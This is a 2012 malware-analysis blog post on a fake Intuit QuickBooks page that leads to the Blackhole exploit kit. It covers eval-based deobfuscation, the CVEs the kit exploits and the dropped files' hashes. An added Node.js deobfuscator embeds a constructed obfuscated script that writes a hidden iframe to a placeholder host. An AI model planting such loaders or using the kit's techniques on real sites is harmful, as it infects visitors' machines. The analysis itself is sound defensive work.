Tuesday, March 6, 2012

Fake Intuit Quickbooks Page Leads to Black Hole Exploit

Posted on Tuesday, March 06, 2012 by Red Horse
Originally posted by kazmot.

The Blackhole Exploit kit is still a very popular attack on the web. Malware uses this exploit kit to propagate and infect unsuspecting users. Here is a detailed analysis of a fake Intuit page that leads to the exploit kit, and of the obfuscation technique used by the attack. In this specific targeted attack, we were able to download a Cridex worm, two PDF files, and an obfuscated JavaScript file.

Let's see first what the fake page looks like:

[Figure 1: Fake Intuit Page]

In the above screenshot, we can immediately notice that it is really fake. You may view the legitimate site of Intuit Quickbooks here. The browser title bar shows "Intuit", but the status bar reveals a hidden connection to a different remote site.

Now, let's see what is in this HTML file...

[Figure 2: Content of the Fake Page]

I used Malzilla to connect to the site and get its content. You can see that, other than the usual title and header shown earlier, it also contains an obfuscated script.

Now to decode this script...

You will notice that I highlighted some variables in Figure 2. When the script is executed, these variables resolve to the window.eval() function. window.eval() is a JavaScript function that executes its argument as code, and here it is used to run the "deobfuscated" code. Malicious scripts commonly obtain eval() indirectly like this, through variables, to avoid script debuggers/emulators that hook the function by name in order to dump the deobfuscated code.

So now, we need to modify the script so that Malzilla will be able to get the argument of the eval() function...

[Figure 3: Removing IF conditions]

Figure 3 shows that in this specific sample, we need to remove some IF statements to make sure that the script is executed.

[Figure 4: Run script and Show Eval() results]

If you look again at the highlighted variables in Figure 2, you will see that the variable "e" ends up holding the window.eval() function. Figure 4 shows the modifications that we applied. Run the script and then hit the "Show eval() results" button. In the bottom box of Figure 4, you will see the deobfuscated code: a hidden iframe that connects to a remote site.

Let's follow this site, shall we...

Again using Malzilla, you need to repeat the steps in order to analyze this remote site. On the Download tab, paste the URL and then hit the "Get" button.

[Figure 5: Contents of the remote site.]

Figure 5 shows that this site contains two script tags, so we need to use "Send all scripts to Decoder". Again, like the first site, you can see here that it uses the same technique where window.eval has been assigned to a variable "e". Apply the same modification that we did earlier, run the script, and then get the eval result. Figure 5 also shows which part of the script you need to change.
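The eval hook behind Malzilla's "Show eval() results" button, used on both the fake page and the remote site above, can be reproduced in a few lines of Node.js. The following is an added example, not code from the original post or from Malzilla. It runs a constructed script that uses the same trick as both samples (window.eval fetched indirectly and stored in a variable "e", with an IF guard in front of the call) inside a scope where window, navigator, document and eval are all stand-ins that record instead of execute. The hostname landing.example.invalid, the user-agent strings, the hex encoding and the document.write() stage are all constructed for the example. Instead of deleting the IF statements as in Figure 3, the fake navigator is given a user agent that satisfies the guard; the second run shows what is captured when it does not.

```javascript
// Added example (not from the original post, not Malzilla's code): a minimal
// eval hook for peeling eval-based obfuscation, the idea behind Malzilla's
// "Show eval() results" button. Everything below is constructed for illustration.

// Hex-encode text; used only to build the constructed sample script.
function hexEncode(text) {
  return Array.from(text, (c) => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}

// Constructed final stage: a hidden iframe pointing at a placeholder host
// (the .invalid TLD is reserved and never resolves).
const DECODED_STAGE =
  '<iframe src="http://landing.example.invalid/in.php" width="0" height="0"></iframe>';

// Constructed sample imitating the pattern in the post: window.eval is fetched
// through a built-up property name and stored in `e`, the payload is decoded at
// run time, and an IF guard decides whether `e` is ever called.
const SAMPLE_SCRIPT = `
var p = "ev" + "al";
var e = window[p];
var h = "${hexEncode("document.write('" + DECODED_STAGE + "')")}";
var s = "";
for (var i = 0; i < h.length; i += 2) { s += String.fromCharCode(parseInt(h.substr(i, 2), 16)); }
if (navigator.userAgent.indexOf("MSIE") !== -1) { e(s); }
`;

// Run one script with window, navigator, document and eval replaced by stand-ins.
// Whatever the script hands to eval (by any alias) or document.write is recorded
// and NOT executed. Parameters named after the globals shadow the real ones inside
// the function body; a sloppy-mode Function body may name a parameter `eval`.
function runHooked(script, userAgent) {
  const evals = [];
  const writes = [];
  const win = {
    navigator: { userAgent },
    document: { write: (html) => { writes.push(String(html)); } },
    eval: (code) => { evals.push(String(code)); },
  };
  win.window = win;
  const run = new Function("window", "navigator", "document", "eval", script);
  run(win, win.navigator, win.document, win.eval);
  return { evals, writes };
}

// Each captured eval argument is itself a script, so run it through the same
// hooks until no new layer appears (bounded, in case a sample loops).
function decodeLayers(script, userAgent, maxDepth = 5) {
  const layers = [];
  const writes = [];
  let pending = [script];
  for (let depth = 0; depth < maxDepth && pending.length > 0; depth++) {
    const next = [];
    for (const code of pending) {
      const result = runHooked(code, userAgent);
      layers.push(...result.evals);
      writes.push(...result.writes);
      next.push(...result.evals);
    }
    pending = next;
  }
  return { layers, writes };
}

// Pull iframe targets out of captured HTML so the next hop can be fetched and
// analysed the same way (the post repeats the process on the remote site).
function extractIframeSources(html) {
  const sources = [];
  const re = /<iframe\b[^>]*\ssrc=["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) sources.push(m[1]);
  return sources;
}

const IE6_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; // constructed
const result = decodeLayers(SAMPLE_SCRIPT, IE6_UA);
console.log("eval layers:", result.layers);
console.log("document.write:", result.writes);
console.log("iframe targets:", result.writes.flatMap(extractIframeSources));
```

Supplying a fake navigator rather than deleting the guard keeps the sample's own control flow intact, which matters when a guard also selects which payload is decoded; running captured layers back through the same hooks handles samples that nest several eval stages, and the iframe extractor hands you the URL to feed into the next round of analysis, as the post does with the remote site.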

[Figure 6: Black Hole exploit code.]

Figure 6 shows the result. You will now see the "Please wait page is loading..." text. This placeholder page is very common in Black Hole exploit code. Initially, the code is on a single line, which makes it a little hard to read. You can use a JavaScript formatter to insert newlines and tabs into the script; an example is jsbeautifier.org.

Let's now take a look at the exploit code...

It searches for vulnerable applications installed in the target system. In this sample, it checks for the following:

  • Adobe Reader
  • Flash Player

[Figure 7: Check installed applications.]

It deploys an MDAC exploit (CVE-2006-0003 - IE6 COM CreateObject Code Execution) to download and execute a malicious file.

  • File: Cridex worm
  • MD5 hash: c3124a2981d8e1b9e13e8c21c96448f7
  • Virustotal Scan Results

[Figure 8: Deploying MDAC exploit.]


It deploys the following PDF exploits:

  • CVE-2008-2992 - Adobe Reader util.printf
    • File: Pdfjsc exploit
    • MD5 hash: 8ad89d5477fe5b074b1767a826207c8a
    • Virustotal Scan Results
  • CVE-2009-0927 - Adobe Reader Collab GetIcon
    • File: Pdfjsc exploit
    • MD5 hash: 84fbc15c2d3e460183b853c566bf3ccf
    • Virustotal Scan Results

[Figure 9: Deploying PDF exploits.]

It deploys an HCP exploit (CVE-2010-1885):

[Figure 10: Deploying HCP exploit.]

The file in the link is an obfuscated script. When the deobfuscated code is saved to a file, the result is:

  • File: Javascript iframe
  • MD5 hash: 1f082ef7e2bc87efa2926a81925e6c46
  • Virustotal Scan Results

[Figure 11: Deobfuscated HCP exploit script]

Finally, it deploys a Flash Player exploit (CVE-2011-0611 - Adobe Flash Player Memory Corruption):

[Figure 12: Deploying Flash exploit.]

More Information:
Black Hole exploit kit

Sample source:
malwaredomainlist.com

References:
Imperva
ZScaler ThreatLab